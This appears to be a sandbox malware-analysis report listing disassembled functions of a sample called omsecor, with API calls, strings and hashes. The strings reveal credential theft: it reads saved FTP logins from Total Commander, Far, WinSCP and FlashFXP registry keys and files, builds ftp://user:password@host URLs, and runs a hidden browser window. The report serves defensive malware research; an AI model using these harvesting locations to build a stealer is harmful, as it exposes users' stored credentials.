Opcode ID: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
Instruction ID: dc85dbecd2d93a1c92e95c54703b850062b4355e184197ecdf44903e32880826
Opcode Fuzzy Hash: 72f3bde2a2d827b3c721072f775774581fb941fcacc32120eed56e62724ecf90
Instruction Fuzzy Hash: 4351F571A00218BBEB206F65DC89AAF3769EB44349F00447BF904BA1D1D77C8D51CBAE

Function 00403C10 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 173COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403C84

Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
Part of subcall function 004039EA: HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403ACF
Part of subcall function 004039EA: StrStrIW.SHLWAPI(?,?), ref: 00403AE4
Part of subcall function 004039EA: GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF

PathRemoveFileSpecW.SHLWAPI(?), ref: 00403CA3

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?), ref: 00403D2C
ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00403DDF

Strings

#, xrefs: 00403D0E
*totalcmd*, xrefs: 00403CB7
SOFTWARE\Ghisler\Total Commander, xrefs: 00403C2F
*total*commander*, xrefs: 00403CC9
&, xrefs: 00403D07
*ghisler*, xrefs: 00403CD8
$, xrefs: 00403CF9
ftpininame, xrefs: 00403C41
installdir, xrefs: 00403DA1

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Heap$AllocEnvironmentExpandPathPrivateProfileStringStrings$FileFolderFreeOpenRemoveSpec
String ID: #$$$&$*ghisler*$*total*commander*$*totalcmd*$SOFTWARE\Ghisler\Total Commander$ftpininame$installdir
API String ID: 2046068145-3914982127
Opcode ID: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction ID: e3ad36e3959a395177e0e2b587ea9ce0600459653a05a841f57562a17ae86195
Opcode Fuzzy Hash: c15ee81aaaa02f11a0fa42fc104bb7fecd640ca8150ae48875d07a4d52372b20
Instruction Fuzzy Hash: AF516D72D0010CABDB10DAA1DC85FDF77BCEB44305F1044BBE515F2181EA789B898B65

Function 004027E6 Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 355comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 004027F5

Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551

Strings

From: true, xrefs: 00402827

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Internet$InitializeOpenOption
String ID: From: true
API String ID: 1176259655-9585188
Opcode ID: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
Instruction ID: 80b93d55993982ee294e6d3758cd093c071ceb3c0ab782597868a4ea0391af47
Opcode Fuzzy Hash: 0909b55861f675bdcf5230ef1fe828563ca9f819dbcea20eb31fe1888ed79e7d
Instruction Fuzzy Hash: 89C1E371E00219AFDF20AFA5CD49A9E77B5AB04304F10447BF814B32D2D6B89D41CFA9

Function 004041E4 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 210registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C0C), ref: 004041FD
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,00000008), ref: 004042B3
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00404373
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404419
RegCloseKey.ADVAPI32(?), ref: 0040442A

Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D

Strings

SOFTWARE\Far\Plugins\ftp\hosts, xrefs: 00404219
username, xrefs: 00404266
hostname, xrefs: 00404258
user, xrefs: 00404274
ftp://%s:%s@%s, xrefs: 004043B7
SOFTWARE\Far2\Plugins\ftp\hosts, xrefs: 0040422A
password, xrefs: 00404282

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: HeapOpen$AllocCloseEnumFree
String ID: SOFTWARE\Far2\Plugins\ftp\hosts$SOFTWARE\Far\Plugins\ftp\hosts$ftp://%s:%s@%s$hostname$password$user$username
API String ID: 416369273-4007225339
Opcode ID: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
Opcode Fuzzy Hash: 3f2736f1e0ff0c0d04b40902a03d476764a73bdda13cc27d97253e0528d23963
Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69

Function 0040451B Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 205registrymemoryCOMMON

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
RegCloseKey.ADVAPI32(?), ref: 0040476D

Strings

portnumber, xrefs: 00404594
username, xrefs: 004045A2
ftp://%s:%s@%s:%u, xrefs: 004046F3
SOFTWARE\martin prikryl\winscp 2\sessions, xrefs: 0040456A
hostname, xrefs: 00404586
password, xrefs: 004045B0

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AllocCloseEnumHeapOpen
String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
API String ID: 3497950970-285550827
Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68

Function 00409301 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
SysFreeString.OLEAUT32(?), ref: 00409359
SysFreeString.OLEAUT32(?), ref: 00409362
SysAllocString.OLEAUT32(?), ref: 004093B8
SysAllocString.OLEAUT32(javascript), ref: 004093C1
SysFreeString.OLEAUT32(00000000), ref: 004093E3
SysFreeString.OLEAUT32(00000000), ref: 004093E6

Strings

http:, xrefs: 00409347
javascript, xrefs: 004093BA
+@, xrefs: 00409301

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: String$Free$Alloc$CharLower
String ID: http:$javascript$+@
API String ID: 1987340527-3375436608
Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64

Function 00405229 Relevance: 16.6, APIs: 3, Strings: 8, Instructions: 134sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00002710), ref: 00405366
Sleep.KERNEL32(00009C40), ref: 00405383
Sleep.KERNEL32(00004E20), ref: 004053D0

Strings

From: , xrefs: 00405318
^key=, xrefs: 004052D0
Via: , xrefs: 0040533C
.html, xrefs: 004052B4
8@, xrefs: 00405275
hOA, xrefs: 00405305
CsM, xrefs: 004053B2
ftp, xrefs: 004052C5

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Sleep
String ID: .html$8@$CsM$From: $Via: $^key=$ftp$hOA
API String ID: 3472027048-1081452883
Opcode ID: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
Opcode Fuzzy Hash: d8c307949237e19763c5e60e3dec01313537889ddc644ade6cf88722956defec
Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D

Function 00407036 Relevance: 16.6, APIs: 11, Instructions: 97filenetworkCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000,74DF0F00), ref: 00407043
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
GetLastError.KERNEL32(00000000), ref: 00407079
SetEndOfFile.KERNEL32(00000000), ref: 0040708F
InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
CloseHandle.KERNEL32(00000000), ref: 004070BB

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
String ID:
API String ID: 3711279109-0
Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66

Function 00408CB7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 239COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(00000016), ref: 00408E7A

Strings

http, xrefs: 00408E1A
_self, xrefs: 00408ED5
+@, xrefs: 00408CB7

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: ClearVariant
String ID: _self$http$+@
API String ID: 1473721057-3317424838
Opcode ID: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
Opcode Fuzzy Hash: d8f59335e3977134d7c78f43a1f56087f7ef2e3c30fa3fc2b5598e0363074b87
Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4

Function 00406ADF Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A

Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED

RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17

Strings

CLSID, xrefs: 00406B3B, 00406B40, 00406B9D, 00406BB5, 00406C28, 00406C40
SOFTWARE\Classes\MIME\Database\Content Type\, xrefs: 00406AF6, 00406B5D, 00406BE8
application/x-javascript, xrefs: 00406B68
text/html, xrefs: 00406B01
text/javascript, xrefs: 00406BF3

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Open$CloseQueryValue
String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
API String ID: 3546245721-1332223170
Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69

Function 0040A156 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
SetParent.USER32(00000000,00000000), ref: 0040A1E2
GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E

Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3

Strings

Shell_TrayWnd, xrefs: 0040A1CF
eventConn, xrefs: 0040A188

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
String ID: Shell_TrayWnd$eventConn
API String ID: 2141107913-3455059086
Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96

Function 004047CC Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 226memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C

HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
StrStrIA.SHLWAPI(?,?), ref: 00404913
StrStrIA.SHLWAPI(?,?), ref: 00404925
StrStrIA.SHLWAPI(?,?), ref: 00404935
StrStrIA.SHLWAPI(?,?), ref: 00404947

Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9

Strings

ftp://%S:%S@%S:%u, xrefs: 004049F6
ftplist.txt, xrefs: 00404805

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
String ID: ftp://%S:%S@%S:%u$ftplist.txt
API String ID: 1635188419-1322549247
Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A

Function 00407362 Relevance: 13.6, APIs: 9, Instructions: 114timesynchronizationCOMMON

Download Yara Rule

APIs

CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
GetLocalTime.KERNEL32(?), ref: 00407387
GetLocalTime.KERNEL32(?), ref: 0040738D
GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
String ID:
API String ID: 3166187867-0
Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69

Function 004089FD Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

http, xrefs: 00408B59
+@, xrefs: 004089FD

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID:
String ID: http$+@
API String ID: 0-4127549746
Opcode ID: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
Opcode Fuzzy Hash: c2f59c2b5613c0f8dd3e4d6de400bb210f2aef3e4c88ef312eb644251266033a
Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4

Function 00403740 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101COMMON

Download Yara Rule

APIs

Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5

ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804

Strings

SOFTWARE\FlashFXP\3, xrefs: 0040375E
#, xrefs: 004037DC
*flashfxp*, xrefs: 004037CE
datafolder, xrefs: 0040376D
&, xrefs: 004037EA

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: EnvironmentExpandFolderOpenPathStrings
String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
API String ID: 1994525040-4055253781
Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69

Function 00409909 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 004099EB
SysAllocString.OLEAUT32(?), ref: 004099F9

Strings

http://, xrefs: 00409941
<url>, xrefs: 0040991C
<domain>, xrefs: 004099BD
</domain>, xrefs: 004099B8
</url>, xrefs: 00409917

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: AllocString
String ID: </domain>$</url>$<domain>$<url>$http://
API String ID: 2525500382-924421446
Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99

Function 00408F26 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(753CF6A0), ref: 00408F82
SysFreeString.OLEAUT32(0000000B), ref: 00409046

Memory Dump Source

Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_omsecor.jbxd

Similarity

API ID: FreeString
String ID:
API String ID: 3341692771-0
Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08

Function 0040AC93 Relevance: 12.1, APIs: 3, Strings: 5, Instructions: 105sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18

Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
Sleep.KERNEL32(0000EA60), ref: 0040AD76
Sleep.KERNEL32(00002710), ref: 0040ADA4

